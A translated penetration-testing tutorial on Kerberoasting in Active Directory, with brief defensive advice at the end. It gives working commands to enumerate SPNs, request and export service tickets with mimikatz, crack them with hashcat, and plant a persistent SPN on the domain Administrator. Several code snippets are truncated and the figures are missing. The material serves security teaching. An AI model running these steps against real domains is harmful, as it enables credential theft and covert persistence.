0x00 Preface
---
Kerberoasting is a commonly used technique in domain penetration. This article will refer to publicly available materials and combine personal understanding to detail the principles and implementation of Kerberoasting, as well as a method for backdoor exploitation, concluding with defensive recommendations.
References:
http://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
http://www.harmj0y.net/blog/redteaming/from-kekeo-to-rubeus/
https://malicious.link/post/2016/kerberoast-pt1/
https://malicious.link/post/2016/kerberoast-pt2/
https://malicious.link/post/2016/kerberoast-pt3/
https://adsecurity.org/?p=3458
https://adsecurity.org/?page_id=183
https://blog.netspi.com/faster-domain-escalation-using-ldap/
https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx
0x01 Introduction
---
This article will cover the following topics:
- Kerberoasting related concepts
- Principles of Kerberoasting
- Implementation of Kerberoasting
- Backdoor exploitation in Kerberoasting
- Defense against Kerberoasting
0x02 Basic Concepts
---
SPN
Official documentation:
https://docs.microsoft.com/en-us/windows/desktop/AD/service-principal-names
Full name: Service Principal Names
SPN is the unique identifier for services running on a server; every service using Kerberos requires an SPN
There are two types of SPNs: one registered under machine accounts (Computers) in AD, and the other registered under domain user accounts (Users)
When a service runs under the Local System or Network Service account, the SPN is registered under the machine account (Computers).
When a service runs under a domain user account, the SPN is registered under the domain user account (Users).
SPN format
serviceclass/host:port/servicename |
Explanation:
- serviceclass can be understood as the service name, common examples include www, ldap, SMTP, DNS, HOST.
- host has two forms: FQDN and NetBIOS name, e.g., server01.test.com and server01.
- If the service runs on the default port, the port number (port) can be omitted.
Querying SPN
Initiating an LDAP query to the domain controller is part of normal Kerberos ticket behavior, so SPN query operations are difficult to detect.
(1) Using SetSPN
Built-in tool in Windows 7 and Windows Server 2008.
View all SPNs in the current domain:
setspn.exe -q */* |
View all SPNs in the test domain:
setspn.exe -T test -q */* |
Example output:
CN=DC1,OU=Domain Controllers,DC=test,DC=com |
Each line starting with CN represents an account, and the information below it is the SPN associated with that account.
For the output data above, the machine accounts (Computers) are:
- CN=DC1,OU=Domain Controllers,DC=test,DC=com
- CN=COMPUTER01,CN=Computers,DC=test,DC=com
Domain user accounts (Users) are:
- CN=krbtgt,CN=Users,DC=test,DC=com
- CN=MSSQL Service Admin,CN=Users,DC=test,DC=com
There are two SPNs registered under the domain user account (Users): kadmin/changepw and MSSQLSvc/DC1.test.com
0x03 Principle of Kerberoasting
---
1. Kerberos Authentication Process
A simple Kerberos authentication process is shown in the figure below
- as_request
- as_reply
- tgs_request
- tgs_reply
- ap_request
- ap_reply
For 4.tgs_reply, the user will receive a TGS (service ticket) encrypted with the NTLM hash of the target service instance, using the RC4-HMAC encryption algorithm.
From an exploitation perspective, after obtaining this TGS, we can attempt to brute-force passwords, simulate the encryption process, generate a TGS for comparison. If the TGS matches, it indicates the password is correct, allowing us to obtain the plaintext password of the target service instance.
2. Windows systems obtain the mapping between services and service instance accounts through SPN queries.
Here is an example:
User a wants to access resources of the MySQL service. During step 4.tgs_reply, the process is as follows:
(1) The Domain Controller queries the SPN of the MySQL service.
If the SPN is registered under a machine account (Computers), it will query the servicePrincipalName attribute of all machine accounts (Computers) to find the corresponding account.
If the SPN is registered under a domain user account (Users), it will query the servicePrincipalName attribute of all domain users (Users) to find the corresponding account.
(2) After finding the corresponding account, use the NTLM hash of that account to generate the TGS.
3. All hosts within the domain can query SPNs.
4. Any user within the domain can request a TGS from any service within the domain.
In summary, any host within the domain can query SPNs, request TGSs from all services within the domain, and then perform brute-force attacks on the obtained TGSs.
For the plaintext passwords obtained through cracking, only the passwords of domain user accounts (Users) are valuable, as machine account passwords cannot be used for remote connections.
Therefore, an efficient exploitation approach is as follows:
- Query SPNs to identify valuable SPNs, which must meet the following conditions:
- The SPN is registered under a domain user account (Users)
- Domain user accounts have high privileges
- Request TGS
- Export TGS
- Brute force cracking
0x04 Kerberoasting Implementation Method One
---
1. Obtain valuable SPNs
Must meet the following conditions:
- The SPN is registered under a domain user account (Users)
- Domain user accounts have high privileges
You can choose from the following three methods:
(1) Using the PowerShell Active Directory module
Note:
The PowerShell Active Directory module must be installed in advance; domain controllers typically have it installed
import-module ActiveDirectory |
For systems without the Active Directory module installed, you can import the Active Directory module using the following command:
import-module .\Microsoft.ActiveDirectory.Management.dll |
Microsoft.ActiveDirectory.Management.dll is generated after installing the PowerShell Active Directory module. I have extracted it and uploaded it to GitHub:
An open-source project
(2) Using PowerView
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
Get-NetUser -spn -AdminCount|Select name,whencreated,pwdlastset,lastlogon |
(3) Using kerberoast
powershell:
https://github.com/nidem/kerberoast/blob/master/GetUserSPNs.ps1
vbs:
https://github.com/nidem/kerberoast/blob/master/GetUserSPNs.vbs
Parameters are as follows:
cscript GetUserSPNs.vbs |
2. Request TGS
(1) Request specific TGS
$SPNName = 'MSSQLSvc/DC1.test.com' |
(2) Request all TGS
Add-Type -AssemblyName System.IdentityModel |
After execution, enter klist to view tickets in memory, where the obtained TGS can be found
3. Export
Using mimikatz
kerberos::list /export |
4. Crack
https://github.com/nidem/kerberoast/blob/master/tgsrepcrack.py
./tgsrepcrack.py wordlist.txt test.kirbi |
0x05 Kerberoasting Implementation Method Two
---
Automated implementation without requiring mimikatz, works with standard user privileges. Reference:
http://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
Code repository:
https://github.com/EmpireProject/Empire/commit/6ee7e036607a62b0192daed46d3711afc65c3921
Uses System.IdentityModel.Tokens.KerberosRequestorSecurityToken to request TGS, extracts TGS from the returned results. The output TGS can be cracked using John the Ripper or Hashcat.
Example demonstration:
Execute on a domain host with standard user privileges:
Invoke-Kerberoast -AdminCount -OutputFormat Hashcat | fl |
-AdminCount selects high-privilege users
Output result as shown in the figure below
Parameter to extract only the hash is as follows:
Invoke-Kerberoast -AdminCount -OutputFormat Hashcat | Select hash | ConvertTo-CSV -NoTypeInformation |
The output result is shown in the following figure
The parameters for cracking with hashcat are as follows:
hashcat -m 13100 /tmp/hash.txt /tmp/password.list -o found.txt --force |
The cracking result is shown in the following figure, successfully obtaining the plaintext password MySQLAdmin111!
Note:
Rubeus can also achieve the functionality of Invoke-Kerberoast, with the address as follows:
https://github.com/GhostPack/Rubeus
The parameters are as follows:
Rubeus.exe kerberoast |
0x06 Backdoor Exploitation of Kerberoasting
---
After obtaining the permission to modify SPN, we can add an SPN for a specified domain user, allowing us to obtain the TGS for that domain user at any time, and after cracking, obtain the plaintext password
For example, to add SPN VNC/DC1.test.com for the domain user Administrator, the parameters are as follows:
setspn.exe -U -A VNC/DC1.test.com Administrator |
As shown in the figure below
This SPN can be obtained from any host within the domain, and Kerberoast can be used to obtain the TGS, as shown below
Then use hashcat to crack it
Additional note:
The parameters to delete the SPN are as follows:
setspn.exe -D VNC/DC1.test.com Administrator |
0x07 Defense
---
From a defensive perspective, it is impossible to prevent kerberoasting, but for SPNs with high attack value (registered under domain user accounts with high privileges), increasing password length can enhance cracking difficulty, and regularly changing the associated domain user passwords is recommended.
Administrators can use Invoke-Kerberoast on a host within the domain to check for dangerous SPNs.
Download link:
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
Parameters:
Get-NetUser -spn -AdminCount|Select name,whencreated,pwdlastset,lastlogon |
0x08 Summary
---
This article provides a detailed introduction to the principles, methods, and defenses of Kerberoasting, along with practical demonstrations.